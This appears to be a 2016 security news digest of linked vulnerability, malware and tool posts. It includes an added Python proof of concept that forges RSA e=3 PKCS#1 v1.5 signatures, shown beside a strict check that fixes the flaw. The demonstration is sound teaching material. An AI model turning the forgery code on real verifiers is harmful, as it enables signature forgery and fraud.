Tencent Xuanwu Lab Security Daily News
-
[ Android ] New post on a vulnerability I found in the #Android Blackphone (BP1) is now up https://www.sentinelone.com/blog/vulnerability-in-blackphone-puts-devices-at-risk-for-takeover/ CVE-2015-6841
"A vulnerability has been found in the Android Blackphone that lets an attacker remotely control the phone's modem (CVE-2015-6841): https://t.co/5pKp812zLO"
-
[ Attack ] SMS Phishing Campaign Spreads in China https://blogs.mcafee.com/mcafee-labs/sms-phishing-campaign-spreads-china/
"An SMS phishing campaign inside China: https://t.co/jfvnXAnPri"
-
[ Attack ] Part two of our analysis of a phishing campaign targeting financial data theft in the healthcare field http://ow.ly/WIDTh #infosec
"Analysis of a phishing campaign targeting financial data theft in the healthcare sector, Part 2: https://t.co/LOiPJXGUq7 #infosec"
-
[ Browser ] In IE11 (latest docmode), the event handling for passive elements depends on "markup quality" (i.e. quirks mode): http://pastebin.com/raw/BSGDKYUn
"In IE11, event handling for passive elements depends on markup quality (i.e. whether the page is in quirks mode): https://t.co/UfxvlxGdtm"
-
[ Defend ] Protecting Windows Networks - Applocker : http://dfir-blog.com/2016/01/03/protecting-windows-networks-applocker/
"Application whitelisting has long been an effective technique against unknown malware, but inconvenient configuration and a steady stream of bypasses have kept it from being as effective in practice. This blog post introduces AppLocker, Windows' built-in application whitelisting feature: https://t.co/X67xooz4gB"
-
[ Detect ] Malicious PDF Analysis : http://blog.didierstevens.com/2010/09/26/free-malicious-pdf-analysis-e-book/ cc: @DidierStevens #b2b (E-book/pdf)
"Malicious PDF document analysis, an e-book Didier Stevens wrote in 2010: https://t.co/KcXOooaPCQ"
-
[ Forensics ] NTFS Forensics : A Programmers View of Raw Filesystem Data Extraction : http://grayscale-research.org/new/pdfs/NTFS%20forensics.pdf
"NTFS forensics: a programmer's view of raw filesystem data extraction: https://t.co/EeudpEmQma"
-
[ Forensics ] File system forensic Analysis : http://www.campus64.com/digital_learning/data/cyber_forensics_essentials/info_file_system_forensic_analysis.pdf (pdf) #b2b
"[Book] File System Forensic Analysis, by Brian Carrier, published by Addison-Wesley Professional in March 2005: (pdf) https://t.co/Mz8YFXuknM"
-
[ Hardware ] GunCon3 Reversing and Linux Driver https://beardypig.github.io/2016/01/06/guncon3/
"Reversing the PlayStation 3 GunCon3 light gun and writing a Linux driver for it: https://t.co/h9rChcsL8v"
-
[ Linux ] [local] - Ubuntu 14.04 LTS, 15.10 overlayfs - Local Root Exploit http://bit.ly/1mzKFGg
"Ubuntu 14.04 LTS and 15.10 overlayfs local root privilege escalation PoC: https://t.co/JlpCw710Jh"
-
[ Malware ] New TeslaCrypt Ransomware Arrives via Spam https://blogs.mcafee.com/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/
"A new TeslaCrypt ransomware variant is spreading via spam: https://t.co/bAaaYgTK8A"
-
[ Malware ] Destructive Disakil malware linked to Ukraine power outages : http://www.symantec.com/connect/blogs/destructive-disakil-malware-linked-ukraine-power-outages-also-used-against-media-organizations , sample: https://ics.sans.org/blog/2016/01/01/potential-sample-of-malware-from-the-ukrainian-cyber-attack-uncovered
"Disakil malware linked to the Ukrainian power outages: https://t.co/6ijMkBmX7l Sample: https://t.co/PvyzYxVWpO"
-
[ Malware ] Yet Another Signed Malware - Spymel http://research.zscaler.com/2016/01/yet-another-signed-malware-spymel.html
"Yet another piece of signed malware: Spymel: https://t.co/oyfEowf6fX"
-
[ Network ] New post: Let's Encrypt Now Being Abused By Malvertisers http://bit.ly/1TEMwDY @TrendMicro
"Let's Encrypt is being abused by malvertisers to redirect users to the Angler Exploit Kit. The Let's Encrypt project issues free certificates to any website so that it can enable HTTPS. https://t.co/XnubVrZCHI"
-
[ Network ] Running a Hidden Tor Service with Docker Compose : http://randywestergren.com/running-a-hidden-tor-service-with-docker-compose/
"Running a Tor hidden service with Docker Compose: https://t.co/0JPXHEEI6t"
-
[ Network ] Scanning the Internet for backdoored ScreenOS devices: some statistics and tales of evading honeypots http://blog.whatever.io/2016/01/06/scanning-the-internet-for-backdoored-screenos-devices-some-statistics-and-tales-of-evading-honeypots/
"Scanning the Internet for backdoored ScreenOS devices: statistics and tales of evading honeypots: https://t.co/Oc0AjWd1Ae"
-
[ Others ] Unauthenticated remote code execution in OpenMRS http://goo.gl/fb/iPuRtN #FullDisclosure
"Unauthenticated remote code execution in OpenMRS (Open Medical Record System): https://t.co/8Ym68EZCzU"
-
[ Others ] Analysis Of A Corrupt OLE File : http://videos.didierstevens.com/2015/12/30/analysis-of-a-corrupt-ole-file/ cc: @DidierStevens
"Analysis of a corrupt OLE file, a demonstration video by Didier Stevens: https://t.co/URmTyvwi4K"
-
[ Others ] MEDCIN Engine Exploitation – Part 2 (CVE-2015-2898-2901, CVE-2015-6006) https://www.securifera.com/blog/2016/01/06/medcin-engine-exploitation-part-2-cve-2015-2898-2901-cve-2015-6006/
"Exploitation of MEDCIN, the knowledge-base engine used in EHR (electronic health record) systems, Part 2 (CVE-2015-2898 through CVE-2015-2901, CVE-2015-6006): https://t.co/SEgGc5Ql9a"
-
[ Others ] Security Analysis of VoLTE, Part 1 https://www.insinuator.net/2016/01/security-analysis-of-volte-part-1/
"Security analysis of VoLTE, Part 1: https://t.co/1ogZrjzjGc"
-
[ Others ] Security experts disclosed SCADAPASS, a list of default credentials for ICS and SCADA systems http://securityaffairs.co/wordpress/43344/hacking/experts-disclosed-scadapass.html
"Security researchers from SCADA StrangeLove have disclosed SCADAPASS, a list of default credentials covering more than 100 ICS and SCADA products: https://t.co/L2nuBKGIdh"
-
[ Others ] Monads to Machine Code (Part 1) - JIT compilation to x86 machine code in Haskell http://www.stephendiehl.com/posts/monads_machine_code.html
"Hands-on JIT compilation in Haskell: turning a monadic assembler into x86 machine code: https://t.co/vPrpg9qbBs"
-
[ Popular Software ] Kaspersky Labs DLL Hijacking https://cxsecurity.com/issue/WLB-2016010022
"Kaspersky DLL hijacking vulnerability; exploitation requires the user to place certain DLLs in their 'Downloads' folder: https://t.co/HBuGZE7xtN"
-
[ ReverseEngineering ] Reverse Engineering for Malware Analysis - cheat sheet wallpaper : http://r00ted.com/cheat%20sheet%20reverse%20v5.png cc: @r00tbsd
"A desktop wallpaper for reverse engineers: common IDA commands, register descriptions, WinDbg commands, frequently used assembly instructions and more, all in one image: https://t.co/vTzegAbOYf cc: @r00tbsd"
-
[ Tools ] ViDi (Visual Disassembler) - tool for static analysis of PE files : https://hshrzd.wordpress.com/vidi-visual-disassembler/ cc: @hasherezade https://t.co/8Xh4Sb3QSM
"ViDi, a visual disassembler for static analysis of PE files, built on bearparser and capstone: https://t.co/vFwLbE3xuE https://t.co/8Xh4Sb3QSM"
-
[ Tools ] Writing a Malware Config Parser Using Radare2 and Ruby http://www.morphick.com/blog/2016/1/6/writing-a-malware-config-parser-using-radare2-and-ruby
"Writing a malware config parser with Radare2 and Ruby: https://t.co/cN0MZb8ywi"
-
[ Tools ] Frida-cfg-hook - instrumentation script which leverages CFG to intercept indirect calls in CFG-enabled Win binaries https://github.com/fdfalcon/frida-cfg-hook
"Frida-cfg-hook, a Frida-based instrumentation script that intercepts indirect calls in CFG-enabled Windows binaries; it works by hooking ntdll!LdrpValidateUserCallTarget, the routine CFG consults before every protected indirect call: https://t.co/AHZnq2UFaX"
-
[ Tools ] We wrapped up #Unit42's series on how to use #IDAPython to make your life easier. Part 4: http://bit.ly/1Rj73AG @jgrunzweig @Unit42_Intel
"Using IDAPython to make your life easier, Part 4: https://t.co/IOFFPgCoCb"
-
[ Vulnerability ] Signature forgery vulnerability in python-rsa : https://blog.filippo.io/bleichenbacher-06-signature-forgery-in-python-rsa/ //CVE-2016-1494 cc: @FiloSottile
"python-rsa signature forgery vulnerability (CVE-2016-1494), a Bleichenbacher '06 style attack on lenient PKCS#1 v1.5 padding checks: https://t.co/Kg1LsSxh6w"
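The Bleichenbacher '06 forgery behind the python-rsa item works whenever a verifier parses the PKCS#1 v1.5 block instead of rebuilding it: with e = 3 and a large enough key, an attacker takes the integer cube root of a block of the form 00 01 FF 00 || DigestInfo || garbage and the cube reproduces the prefix exactly, with only the garbage disturbed. The following is an added example written for this digest, not code from python-rsa or from Filippo Valsorda's post. The modulus N is a constructed 3072-bit odd integer standing in for an e = 3 public key (only the public half is ever used, so its factorisation is irrelevant), `lenient_verify` is an illustration of the vulnerable class of check rather than the library's actual code, and the sample message is constructed.

```python
import hashlib
import hmac

# DER DigestInfo prefix for SHA-256 (RFC 8017, section 9.2, note 1).
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")

# Constructed stand-in for a 3072-bit RSA public key with e = 3 (assumption:
# not a real key; only size and public exponent matter for the forgery).
KEYLEN = 384
N = (1 << 3071) | (0xC0FFEE << 64) | 1
E = 3


def icbrt_ceil(x: int) -> int:
    """Smallest integer s with s**3 >= x, by binary search on big integers."""
    lo, hi = 0, 1 << ((x.bit_length() + 2) // 3 + 1)
    while lo < hi:
        mid = (lo + hi) // 2
        if mid ** 3 < x:
            lo = mid + 1
        else:
            hi = mid
    return lo


def digest_info(msg: bytes) -> bytes:
    return SHA256_DIGESTINFO + hashlib.sha256(msg).digest()


def expected_block(msg: bytes) -> bytes:
    """EMSA-PKCS1-v1_5 encoding: 00 01 FF..FF 00 || DigestInfo, exactly KEYLEN bytes."""
    t = digest_info(msg)
    return b"\x00\x01" + b"\xff" * (KEYLEN - len(t) - 3) + b"\x00" + t


def lenient_verify(sig: int, msg: bytes) -> bool:
    """Parser-style check of the vulnerable kind: it accepts any number of FF
    bytes (even a single one) and never looks at what follows the hash."""
    em = pow(sig, E, N).to_bytes(KEYLEN, "big")
    if em[:2] != b"\x00\x01":
        return False
    sep = em.find(b"\x00", 2)          # first 00 after the 00 01 header
    if sep < 0:
        return False
    rest = em[sep + 1:]
    if not rest.startswith(SHA256_DIGESTINFO):
        return False
    start = len(SHA256_DIGESTINFO)
    return rest[start:start + 32] == hashlib.sha256(msg).digest()


def strict_verify(sig: int, msg: bytes) -> bool:
    """Correct check: rebuild the whole expected block and compare byte for byte."""
    em = pow(sig, E, N).to_bytes(KEYLEN, "big")
    return hmac.compare_digest(em, expected_block(msg))


def forge(msg: bytes) -> int:
    """Bleichenbacher '06 with e = 3: place the DigestInfo right after a minimal
    00 01 FF 00 header, fill the rest with zero garbage, and take the ceiling of
    the cube root. s**3 - target < 3*s**2 + 3*s + 1, which is far smaller than
    the garbage space, so the cube keeps the prefix intact. No private key used."""
    prefix = b"\x00\x01\xff\x00" + digest_info(msg)
    garbage_bits = (KEYLEN - len(prefix)) * 8
    target = int.from_bytes(prefix, "big") << garbage_bits
    s = icbrt_ceil(target)
    # s**3 must stay below N so the public-key operation does not wrap, and
    # the high bits of the cube must still spell out the chosen prefix.
    assert s ** 3 < N and (s ** 3) >> garbage_bits == target >> garbage_bits
    return s


if __name__ == "__main__":
    msg = b"transfer 1000 BTC to attacker"   # constructed sample message
    s = forge(msg)
    print("lenient parser accepts forgery:", lenient_verify(s, msg))
    print("strict comparison accepts forgery:", strict_verify(s, msg))
```

Nothing about N is used except its length and e = 3, so the same `forge` output is a valid-looking signature for every 3072-bit e = 3 key against a lenient verifier. The fix is the one `strict_verify` shows: never parse the decrypted block, rebuild the one block the signer must have produced and compare the whole thing in constant time.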
-
[ Web Security ] Web vulnerabilities to gain access to the system http://www.enye-sec.org/en/papers/web_vuln-en.txt
"From web vulnerabilities to system access and remote command execution: https://t.co/k5TJqM6WGg"
-
[ Web Security ] DOM XSS 101 Walk-Through : http://neonprimetime.blogspot.in/2016/01/dom-xss-101-walk-through.html
"An introduction to DOM XSS: https://t.co/pNB2auzOj6"
-
[ Web Security ] All versions of @Drupal vulnerable to code execution, credential theft via #MitM attack - http://ow.ly/WIUHo
"All versions of Drupal are vulnerable to code execution, and keys and credentials can be stolen through a man-in-the-middle attack. ThreatPost's report: https://t.co/6sJBMiMcjx IOActive's analysis of the vulnerability: http://blog.ioactive.com/2016/01/drupal-insecure-update-process.html"
-
[ Windows ] Reversing and Recreating a Protected DLL : http://reverseengineeringtips.blogspot.in/2016/01/bypassing-protections-reversing-and.html
"Bypassing protections: reversing and recreating a protected DLL: https://t.co/H82agAS7Za"